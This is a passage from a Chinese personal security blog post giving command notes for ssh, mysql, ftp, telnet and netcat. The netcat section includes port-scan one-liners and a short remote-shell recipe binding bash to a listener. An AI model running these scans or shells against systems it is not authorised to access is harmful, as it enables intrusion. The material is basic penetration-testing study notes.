<!DOCTYPE HTML>
<html lang="en">
<head>
    

<head><meta name="generator" content="Hexo 3.9.0">
    <meta charset="utf-8">
    <meta name="keywords" content="常见端口连接以及nc的使用, wh1te">
    <meta name="description" content="About Port Connections

关于端口连接方式
0x00 前言随手记以下常见端口的连接方式，加强记忆。主要有ssh，mysql，telnet，ftp。以及nc瑞士军刀的使用。
0x01 SSHssh作为远程连接命令还是比较">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta name="renderer" content="webkit|ie-stand|ie-comp">
    <meta name="mobile-web-app-capable" content="yes">
    <meta name="format-detection" content="telephone=no">
    <meta name="apple-mobile-web-app-capable" content="yes">
    <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
    <title>常见端口连接以及nc的使用 | wh1te</title>
    <link rel="icon" type="image/png" href="/favicon.png">

    <link rel="stylesheet" type="text/css" href="/libs/awesome/css/font-awesome.min.css">
    <link rel="stylesheet" type="text/css" href="/libs/materialize/css/materialize.min.css">
    <link rel="stylesheet" type="text/css" href="/libs/aos/aos.css">
    <link rel="stylesheet" type="text/css" href="/libs/animate/animate.min.css">
    <link rel="stylesheet" type="text/css" href="/libs/lightGallery/css/lightgallery.min.css">
    <link rel="stylesheet" type="text/css" href="/css/matery.css">
    <link rel="stylesheet" type="text/css" href="/css/my.css">

    <script src="/libs/jquery/jquery-2.2.0.min.js"></script>
</head>

</head>

<body>

<header class="navbar-fixed">
    <nav id="headNav" class="bg-color nav-transparent">
        <div id="navContainer" class="container">
            <div class="nav-wrapper">
                <div class="brand-logo">
                    <a href="/" class="waves-effect waves-light">
                        
                        <img src="/medias/logo.png" class="logo-img hide-on-small-only">
                        
                        <span class="logo-span">wh1te</span>
                    </a>
                </div>
                <a href="#" data-activates="mobile-nav" class="button-collapse"><i class="fa fa-navicon"></i></a>
<ul class="right">
    
    <li class="hide-on-med-and-down">
        <a href="/" class="waves-effect waves-light">
            
            <i class="fa fa-home"></i>
            
            <span>Index</span>
        </a>
    </li>
    
    <li class="hide-on-med-and-down">
        <a href="/tags" class="waves-effect waves-light">
            
            <i class="fa fa-tags"></i>
            
            <span>Tags</span>
        </a>
    </li>
    
    <li class="hide-on-med-and-down">
        <a href="/categories" class="waves-effect waves-light">
            
            <i class="fa fa-bookmark"></i>
            
            <span>Categories</span>
        </a>
    </li>
    
    <li class="hide-on-med-and-down">
        <a href="/archives" class="waves-effect waves-light">
            
            <i class="fa fa-archive"></i>
            
            <span>Archives</span>
        </a>
    </li>
    
    <li class="hide-on-med-and-down">
        <a href="/about" class="waves-effect waves-light">
            
            <i class="fa fa-user-circle-o"></i>
            
            <span>About</span>
        </a>
    </li>
    
    <li>
        <a id="toggleSearch" class="waves-effect waves-light">
            <i id="searchIcon" class="mdi-action-search"></i>
        </a>
    </li>

</ul>

<div class="side-nav" id="mobile-nav">

    <div class="mobile-head bg-color">
        
        <img src="/medias/logo.png" class="logo-img circle responsive-img">
        
        <div class="logo-name">wh1te</div>
        <div class="logo-desc">
            
            不忘初心，方得始终
            
        </div>
    </div>

    <ul class="menu-list mobile-menu-list">
        
        <li>
            <a href="/" class="waves-effect waves-light">
                
                <i class="fa fa-fw fa-home"></i>
                
                Index
            </a>
        </li>
        
        <li>
            <a href="/tags" class="waves-effect waves-light">
                
                <i class="fa fa-fw fa-tags"></i>
                
                Tags
            </a>
        </li>
        
        <li>
            <a href="/categories" class="waves-effect waves-light">
                
                <i class="fa fa-fw fa-bookmark"></i>
                
                Categories
            </a>
        </li>
        
        <li>
            <a href="/archives" class="waves-effect waves-light">
                
                <i class="fa fa-fw fa-archive"></i>
                
                Archives
            </a>
        </li>
        
        <li>
            <a href="/about" class="waves-effect waves-light">
                
                <i class="fa fa-fw fa-user-circle-o"></i>
                
                About
            </a>
        </li>
        
        
    </ul>

    <div class="social-link"><a href="https://github.com/lddp" class="tooltipped" target="_blank" data-tooltip="访问我的GitHub" data-position="top" data-delay="50">
    <i class="fa fa-github"></i>
</a>
<a href="mailto:1061722245@qq.com" class="tooltipped" target="_blank" data-tooltip="邮件联系我" data-position="top" data-delay="50">
    <i class="fa fa-envelope-open"></i>
</a>
<a href="#!" class="tooltipped" data-tooltip="QQ联系我: 1061722245" data-position="top" data-delay="50">
    <i class="fa fa-qq"></i>
</a>
</div>
</div>

            </div>
        </div>

        
    </nav>
</header>





<div class="bg-cover post-cover" style="background-image: url('/medias/featureimages/9.jpg')">
    <div class="container">
        <div class="row">
            <div class="col s12 m12 l12">
                <div class="brand">
                    <div class="description center-align post-title">
                        常见端口连接以及nc的使用
                    </div>
                </div>
            </div>
        </div>
    </div>
</div>



<main class="post-container content">

    
    <link rel="stylesheet" href="/libs/tocbot/tocbot.css">
<style>
    #articleContent h1,
    #articleContent h2,
    #articleContent h3,
    #articleContent h4,
    #articleContent h5,
    #articleContent h6 {
        padding-top: 76px;
        margin-top: -76px;
    }

    #articleContent h1 {
        line-height: 3.5rem;
    }

    #articleContent h2 {
        line-height: 3.2rem;
    }

    #articleContent h3 {
        line-height: 2.8rem;
    }

    #articleContent h4 {
        line-height: 2.5rem;
    }

    #articleContent h5 {
        line-height: 2.2rem;
    }

    #articleContent h6 {
        line-height: 1.9rem;
    }

    #articleContent :focus {
        outline: none;
    }

    .toc-fixed {
        position: fixed;
        top: 64px;
    }

    .toc-widget {
        padding-left: 20px;
    }

    .toc-widget .toc-title {
        margin: 35px 0 15px 0;
        padding-left: 17px;
        font-size: 1.5rem;
        font-weight: bold;
        line-height: 1.5rem;
    }

    .toc-widget ol {
        padding: 0;
        list-style: none;
    }

    #toc-content ol {
        padding-left: 10px;
    }

    #toc-content ol li {
        padding-left: 10px;
    }

    #toc-content .toc-link:hover {
        color: #42b983;
        font-weight: 700;
        text-decoration: underline;
    }

    #toc-content .toc-link::before {
        background-color: transparent;
        max-height: 25px;
    }

    #toc-content .is-active-link {
        color: #42b983;
    }

    #toc-content .is-active-link::before {
        background-color: #42b983;
    }
</style>
<div class="row">
    <div class="col s12 m12 l9">
        <!-- 文章内容详情 -->
<div id="artDetail">
    <div class="card">
        <div class="card-content article-info">
            
            <div class="article-tag">
                
                <a href="/tags/Note/" target="_blank">
                    <span class="chip bg-color">Note</span>
                </a>
                
                <a href="/tags/WEB/" target="_blank">
                    <span class="chip bg-color">WEB</span>
                </a>
                
            </div>
            
            <div class="post-info">
                
                <span class="post-cate">
                    <i class="fa fa-bookmark fa-fw icon-category"></i>
                    
                    <a href="/categories/Skill/" class="post-category" target="_blank">
                        Skill
                    </a>
                    
                </span>
                

                <span class="post-date">
                    <i class="fa fa-clock-o fa-fw"></i>2018-05-10
                </span>
            </div>
        </div>
        <hr>
        <div class="card-content article-card-content">
            <div id="articleContent">
                <p>About Port Connections</p>
<a id="more"></a>
<h2 id="关于端口连接方式"><a href="#关于端口连接方式" class="headerlink" title="关于端口连接方式"></a>关于端口连接方式</h2><hr>
<h4 id="0x00-前言"><a href="#0x00-前言" class="headerlink" title="0x00 前言"></a>0x00 前言</h4><p>随手记以下常见端口的连接方式，加强记忆。主要有ssh，mysql，telnet，ftp。以及nc瑞士军刀的使用。</p>
<h4 id="0x01-SSH"><a href="#0x01-SSH" class="headerlink" title="0x01 SSH"></a>0x01 SSH</h4><p>ssh作为远程连接命令还是比较常用的，而且也比较简单。<br>常用参数：<br>-l 指定登录名<br>-h 主机名，即ip地址<br>-p 端口名<br>–help 通过查看帮助可以来学习更多的参数操作</p>
<p>用法：</p>
<pre><code class="bash">ssh --help
ssh 192.168.1.114
ssh -l root 192.168.1.114
ssh -l root -p 12345 192.168.1.114
ssh -p 12345 root@192.168.1.114</code></pre>
<p>个人感觉-p参数还是比较实用的，在实际情况里，ssh对应的不是固定端口，是可以通过修改配置文件来修改的。<br>ssh可以做的事情不止这些。推荐博客：<br><a href="https://www.cnblogs.com/xuxiuxiu/p/6269538.html" target="_blank" rel="noopener">SSH命令详解2</a></p>
<h4 id="0x02-mysql"><a href="#0x02-mysql" class="headerlink" title="0x02 mysql"></a>0x02 mysql</h4><p>其实连接数据库还是有很多方法的，python，php等等有支持连接数据的函数，以及很多操作数据的软件。主要介绍下cmd框连接数据库。<br>常用参数：<br>-h 数据库的主机名<br>-u 帐户名<br>-p 密码<br>-P 指定端口<br>–help 可以通过查看帮助来学习更多的参数操作<br>用法：</p>
<pre><code class="bash">mysql --help
mysql -uroot -proot
mysql -h192.168.1.114 -uroot -proot
mysql -h192.168.1.114 -uroot -proot -P33060</code></pre>
<p>一般第一种连接方式默认的是数据库在本机，默认端口3306，用的比较多，但是实际应用中，数据库往往是不在本地的，端口也不一定。骚年，站库分离了解下。</p>
<h4 id="0x03-ftp"><a href="#0x03-ftp" class="headerlink" title="0x03 ftp"></a>0x03 ftp</h4><p>ftp的连接只是在测试的时候用过，具体的实践操作，我测试完了再对本篇博客进行修改。由于我本人用的不多，附加上了常用的命令。<br>参数：<br>-v 禁止显示远程服务器响应<br>-n 禁止自动登录到初始连接<br>-i 多个文件传送时关闭交互提示<br>-d 启用调试、显示在客户端和服务器之间传递的所有 ftp命令<br>-g 禁用文件名组，它允许在本地文件和路径名中使用通配符字符（* 和 ?）。（请参阅联机“命令参考”中的 glob 命令。）<br>-s filename指定包含 ftp 命令的文本文件；当 ftp 启动后，这些命令将自动运行。该参数中不允许有空格。使用该开关而不是重定向 (&gt;)<br>-a 在捆绑数据连接时使用任何本地接口<br>-w windowsize 替代默认大小为 4096 的传送缓冲区</p>
<p>常用命令：<br>！ 从ftp子系统退出到系统外壳<br>？ 显示ftp说明，跟help一样<br>append 添加文件，格式为：append 本地文件远程文件<br>cd 更换远程目录<br>lcd 更换本地目录，若无参数，将显示当前目录<br>open 与指定的ftp服务器连接 open computer [port]<br>close 结束与远程服务器的FTP会话并返回命令解释程序<br>bye 结束与远程计算机的 FTP 会话并退出 ftp<br>dir 产看本目录下的内容<br>get和recv 使用当前文件转换类型将远程文件复制到本地计算机 get remote-file [local-file]<br>send和put 上传文件：send local-file [remote-file]<br>用法：</p>
<pre><code class="bash">ftp 192.168.1.114</code></pre>
<p>具体的操作还是要连接进去看的，实践出真知嘛。</p>
<h4 id="0x04-telnet"><a href="#0x04-telnet" class="headerlink" title="0x04 telnet"></a>0x04 telnet</h4><p>telnet命令用于登录远程主机，对远程主机进行管理.这个在实际应用中跟ssh，ftp经常一块出现，非常常见。<br>常见参数：<br>-8：允许使用8位字符资料，包括输入与输出<br>-a：尝试自动登入远端系统<br>-b&lt;主机别名&gt;：使用别名指定远端主机名称<br>-c：不读取用户专属目录里的.telnetrc文件<br>-d：启动排错模式<br>-e&lt;脱离字符&gt;：设置脱离字符<br>-E：滤除脱离字符<br>-f：此参数的效果和指定”-F”参数相同<br>-F：使用Kerberos V5认证时，加上此参数可把本地主机的认证数据上传到远端主机<br>-k&lt;域名&gt;：使用Kerberos认证时，加上此参数让远端主机采用指定的领域名，而非该主机的域名<br>-K：不自动登入远端主机<br>-l&lt;用户名称&gt;：指定要登入远端主机的用户名称<br>-L：允许输出8位字符资料<br>-n&lt;记录文件&gt;：指定文件记录相关信息<br>-r：使用类似rlogin指令的用户界面<br>-S&lt;服务类型&gt;：设置telnet连线所需的ip TOS信息<br>-x：假设主机有支持数据加密的功能，就使用它<br>-X&lt;认证形态&gt;：关闭指定的认证形态<br>用法：<br>其实我一般用的最多的就是直接连接，最多也就是换个端口。</p>
<pre><code class="bash">telnet 192.168.1.114
telnet 192.168.1.114 12345</code></pre>
<h2 id="关于nc的使用"><a href="#关于nc的使用" class="headerlink" title="关于nc的使用"></a>关于nc的使用</h2><p>nc是一个很强大的网络工具，全称是netcat。一个简单而有用的工具，透过使用TCP或UDP协议的网络连接去读写数据。它被设计成一个稳定的后门工具，能够直接由其它程序和脚本轻松驱动。同时，它也是一个功能强大的网络调试和探测工具，能够建立你需要的几乎所有类型的网络连接。<br>总而言之我自己感觉，这东西真的很叼。</p>
<p>nc语法：<br>nc [-hlnruz][-g&lt;网关…&gt;][-G&lt;指向器数目&gt;][-i&lt;延迟秒数&gt;][-o&lt;输出文件&gt;][-p&lt;通信端口&gt;][-s&lt;来源位址&gt;][-v…][-w&lt;超时秒数&gt;][主机名称][通信端口…]</p>
<p>nc参数：<br>-g&lt;网关&gt; 设置路由器跃程通信网关，最多可设置8个<br>-G&lt;指向器数目&gt;设置来源路由指向器，其数值为4的倍数<br>-h 在线帮助<br>-i&lt;延迟秒数&gt;设置时间间隔，以便传送信息及扫描通信端口<br>-l 使用监听模式，管控传入的资料<br>-n 直接使用IP地址，而不通过域名服务器<br>-o&lt;输出文件&gt;指定文件名称，把往来传输的数据以16进制字码倾倒成该文件保存<br>-p&lt;通信端口&gt; 设置本地主机使用的通信端口<br>-r 乱数指定本地与远端主机的通信端口<br>-s&lt;来源位址&gt; 设置本地主机送出数据包的IP地址<br>-u 使用UDP传输协议<br>-v 显示指令执行过程<br>-w&lt;超时秒数&gt; 设置等待连线的时间<br>-z 使用0输入/输出模式，只在扫描通信端口时使用  </p>
<p>nc用法：<br>连接主机/探测服务：</p>
<pre><code class="bash">nc 192.168.1.114 22
nc -nvv 192.168.1.114 22</code></pre>
<p>监听本地端口：</p>
<pre><code class="bash">nc 9999</code></pre>
<p>通信：</p>
<pre><code class="bash">nc -l 9999  A机上执行，然后可以输入
nc 192.168.1.114 9999   B机上执行，ip是A机，可以输入
这样A，B输入输出的信息都可以在对方的shell中展示</code></pre>
<p>文件传输：</p>
<pre><code class="bash">nc -l 9999 &lt; file.txt   这个类似于上面的通信
nc 192.168.1.114 9999 &gt; file.txt</code></pre>
<p>电子取证（信息映射）：</p>
<pre><code class="bash">nc -l -p 9999
ls -l |nc -nv 192.168.1.114 9999
这样B机上执行ls命令的结果机会映射在A机上</code></pre>
<p>端口扫描：</p>
<pre><code class="bash">nc -nvz 192.168.1.114 1-65535 TCP端口扫描
nc -nvzu 192.168.1.114 1-65535 UDP端口扫描</code></pre>
<p>反弹shell：</p>
<pre><code class="bash">监听方：nc -nv 192.168.1.114 9999
连接方：nc -lp 9999 -bash
这样监听方就可以执行连接方shell命令了，不过windows需要把bash改为cmd</code></pre>
<p>nc功能很强大，使用的话，个人建议看nc -h的官方参数介绍，虽然都是英文的。<br>借鉴了两位大佬的博客，表示感谢。</p>
<p><a href="https://www.cnblogs.com/jjzd/p/6306273.html" target="_blank" rel="noopener">nc命令用法收集</a></p>
<p><a href="http://www.secist.com/archives/182.html" target="_blank" rel="noopener">网络中的瑞士军刀之NC的详细使用</a></p>
<h2 id="小结"><a href="#小结" class="headerlink" title="小结"></a>小结</h2><p>主要简单说了下常见的几个端口服务，也是渗透测试中经常碰到的，需要去利用的。关于工具的学习，我比较建议去看官方的英文手册（虽然我英语不咋地），也就是 –help的东西，网上博客的翻译有的确实比较垃圾，包括我的这篇博客，也是一样的，只不过在目前，我用到的，也就是我写的这么多。随手记下，方便学习。</p>
<hr>
<p>打赏功能已开启，希望各位大佬多多支持。评论功能以及浏览人数等小设置，后期在搞吧。能力有限，如果你也感兴趣，我们可以共同学习，共同成长。</p>

            </div>
            <hr/>

            
            <style>
    #reward {
        margin: 40px 0;
        text-align: center;
    }

    #reward .reward-link {
        font-size: 1.88rem;
    }

    #reward .btn-floating:hover {
        box-shadow: 0 6px 12px rgba(0, 0, 0, 0.2), 0 5px 15px rgba(0, 0, 0, 0.2);
    }

    #rewardModal {
        width: 320px;
        height: 350px;
    }

    #rewardModal .reward-title {
        margin: 15px auto;
        padding-bottom: 5px;
    }

    #rewardModal .modal-content {
        padding: 10px;
    }

    #rewardModal .close {
        position: absolute;
        right: 15px;
        top: 15px;
        color: rgba(0, 0, 0, 0.5);
        font-size: 1.3rem;
        line-height: 20px;
        cursor: pointer;
    }

    #rewardModal .reward-tabs {
        margin: 0 auto;
        width: 210px;
    }

    .reward-tabs .tabs {
        height: 38px;
        margin: 10px auto;
        padding-left: 0;
    }

    .reward-tabs .tabs .tab {
        height: 38px;
        line-height: 38px;
    }

    .reward-tabs .tab a {
        color: #fff;
        background-color: #ccc;
    }

    .reward-tabs .tab a:hover {
        color: #fff;
    }

    .reward-tabs .wechat-tab .active {
        color: #fff;
        background-color: #22AB38;
    }

    .reward-tabs .alipay-tab .active {
        color: #fff;
        background-color: #019FE8;
    }

    .reward-tabs .reward-img {
        width: 210px;
        height: 210px;
    }
</style>

<div id="reward">
    <a class="reward-link btn-floating btn-large waves-effect waves-light red">赏</a>

    <!-- Modal Structure -->
    <div id="rewardModal" class="modal">
        <div class="modal-content">
            <a class="close"><i class="fa fa-close"></i></a>
            <h4 class="reward-title">你的赏识是我前进的动力</h4>
            <div class="reward-content">
                <div class="reward-tabs">
                    <ul class="tabs">
                        <li class="tab wechat-tab waves-effect waves-light"><a class="active" href="#wechat">微信</a></li>
                        <li class="tab alipay-tab waves-effect waves-light"><a href="#alipay">支付宝</a></li>
                    </ul>
                    <div id="wechat">
                        <img src="/medias/reward/wechat.png" class="reward-img" alt="微信打赏二维码">
                    </div>
                    <div id="alipay">
                        <img src="/medias/reward/alipay.jpg" class="reward-img" alt="支付宝打赏二维码">
                    </div>
                </div>
            </div>
        </div>
    </div>
</div>

<script>
    $(function () {
        $('#reward .reward-link').on('click', function () {
            $('#rewardModal').openModal();
        });

        $('#rewardModal .close').on('click', function () {
            $('#rewardModal').closeModal();
        });
    });
</script>
            

            <link rel="stylesheet" type="text/css" href="/libs/share/css/share.min.css">

<div id="article-share">
    
    <div class="social-share" data-disabled="qzone, qq, weibo, douban"></div>
    
</div>

<script src="/libs/share/js/social-share.min.js"></script>

            <div class="reprint">
                <p>
                    <span class="reprint-tip">Reprint please specify: </span>
                    <a href="http://yoursite.com" class="b-link-green">wh1te</a>
                    <i class="fa fa-angle-right fa-lg fa-fw text-color"></i>
                    <a href="/2018/05/10/常见端口连接以及nc的使用/" class="b-link-green">常见端口连接以及nc的使用</a>
                </p>
            </div>
        </div>
    </div>

    

    

    

    

    

    

<article id="prenext-posts" class="prev-next articles">
    <div class="row article-row">
        
        <div class="article col s12 m6" data-aos="fade-up">
            <div class="article-badge left-badge text-color">Previous</div>
            <div class="card">
                <a href="/2018/05/10/masscan/">
                    <div class="card-image">
                        
                        
                        <img src="/medias/featureimages/9.jpg" class="responsive-img" alt="masscan的使用">
                        
                        <span class="card-title">masscan的使用</span>
                    </div>
                </a>
                <div class="card-content article-content">
                    <div class="summary">About masscan basic knowledge

About masscan
0x00 前言masscan的使用类似于nmap，其实也不用分开写，参数什么的也都差不多，只不过masscan比nmap更快一些，当扫描的ip数量比较</div>
                    <div class="publish-info">
                        <span class="publish-date">
                            <i class="fa fa-clock-o fa-fw icon-date"></i>2018-05-10
                        </span>
                        <span class="publish-author">
                            
                            <i class="fa fa-bookmark fa-fw icon-category"></i>
                            
                            <a href="/categories/Skill/" class="post-category" target="_blank">
                                    Skill
                                </a>
                            
                            
                        </span>
                    </div>
                </div>
                
                <div class="card-action article-tags">
                    
                    <a href="/tags/Note/" target="_blank">
                        <span class="chip bg-color">Note</span>
                    </a>
                    
                </div>
                
            </div>
        </div>
        
        
        <div class="article col s12 m6" data-aos="fade-up">
            <div class="article-badge right-badge text-color">Next</div>
            <div class="card">
                <a href="/2018/05/10/sqlmap的使用/">
                    <div class="card-image">
                        
                        
                        <img src="/medias/featureimages/18.jpg" class="responsive-img" alt="Sqlmap">
                        
                        <span class="card-title">Sqlmap</span>
                    </div>
                </a>
                <div class="card-content article-content">
                    <div class="summary">About Sqlmap

About Sqlmap Security
0x01 前言关于sqlmap，其实早就想写下总结个这哥是我接触安全认识的第一个神器，非常之叼。sqlmap是十分著名的自动化的SQL注入工具，他是开源的，由pytho</div>
                    <div class="publish-info">
                            <span class="publish-date">
                                <i class="fa fa-clock-o fa-fw icon-date"></i>2018-05-10
                            </span>
                        <span class="publish-author">
                            
                            <i class="fa fa-bookmark fa-fw icon-category"></i>
                            
                            <a href="/categories/Skill/" class="post-category" target="_blank">
                                    Skill
                                </a>
                            
                            
                        </span>
                    </div>
                </div>
                
                <div class="card-action article-tags">
                    
                    <a href="/tags/Note/" target="_blank">
                        <span class="chip bg-color">Note</span>
                    </a>
                    
                </div>
                
            </div>
        </div>
        
    </div>
</article>
</div>


    </div>
    <div class="col l3 hide-on-med-and-down">
        <div class="toc-widget">
            <div class="toc-title">TOC</div>
            <div id="toc-content">

            </div>
        </div>
    </div>
</div>

<script src="/libs/tocbot/tocbot.min.js"></script>
<script>
    $(function () {
        tocbot.init({
            tocSelector: '#toc-content',
            contentSelector: '#articleContent',
            headingSelector: 'h2, h3, h4'
        });

        // modify the toc link href to support Chinese.
        let i = 0;
        let tocHeading = 'toc-heading-';
        $('#toc-content a').each(function () {
            $(this).attr('href', '#' + tocHeading + (++i));
        });

        // modify the heading title id to support Chinese.
        i = 0;
        $('#articleContent').children('h2, h3, h4').each(function () {
            $(this).attr('id', tocHeading + (++i));
        });

        // Set scroll toc fixed.
        let tocHeight = parseInt($(window).height() * 0.4 - 64);
        let $tocWidget = $('.toc-widget');
        $(window).scroll(function () {
            let scroll = $(window).scrollTop();
            /* add post toc fixed. */
            if (scroll > tocHeight) {
                $tocWidget.addClass('toc-fixed');
            } else {
                $tocWidget.removeClass('toc-fixed');
            }
        });
    });
</script>
    

</main>


<footer class="page-footer bg-color">
    <div class="container row center-align">
        <div class="col s12 m8 l8 copy-right">
            本站由&copy;<a href="https://lddp.github.io/" target="_blank">wh1te</a>基于
            <a href="https://hexo.io/" target="_blank">Hexo</a> 采用
            <a href="https://github.com/blinkfox/hexo-theme-matery" target="_blank">hexo-theme-matery</a>的主题搭建.
        </div>
        <div class="col s12 m4 l4 social-link"><a href="https://github.com/lddp" class="tooltipped" target="_blank" data-tooltip="访问我的GitHub" data-position="top" data-delay="50">
    <i class="fa fa-github"></i>
</a>
<a href="mailto:1061722245@qq.com" class="tooltipped" target="_blank" data-tooltip="邮件联系我" data-position="top" data-delay="50">
    <i class="fa fa-envelope-open"></i>
</a>
<a href="#!" class="tooltipped" data-tooltip="QQ联系我: 1061722245" data-position="top" data-delay="50">
    <i class="fa fa-qq"></i>
</a>
</div>
    </div>
</footer>

<div class="progress-bar"></div>


<!-- 搜索遮罩框 -->
<div id="searchModal" class="modal">
    <div class="modal-content">
        <div class="search-header">
            <span class="title">Search</span>
            <input type="search" id="searchInput" name="s" placeholder="Please enter a search keyword"
                   class="search-input" autofocus="">
        </div>
        <div id="searchResult"></div>
    </div>
</div>

<script src="/js/search.js"></script>
<script type="text/javascript">
    searchFunc("/" + "search.xml", 'searchInput', 'searchResult');
</script>
<!-- 回到顶部按钮 -->
<div id="backTop" class="top-scroll">
    <a class="btn-floating btn-large waves-effect waves-light" href="#!">
        <i class="fa fa-angle-up"></i>
    </a>
</div>


<script src="/libs/materialize/js/materialize.min.js"></script>
<script src="/libs/masonry/masonry.pkgd.min.js"></script>
<script src="/libs/aos/aos.js"></script>
<script src="/libs/scrollprogress/scrollProgress.min.js"></script>
<script src="/libs/lightGallery/js/lightgallery-all.min.js"></script>
<script src="/js/matery.js"></script>
<script type="text/javascript" src="/js/love.js"></script>
<!-- Global site tag (gtag.js) - Google Analytics -->


</body>
</html>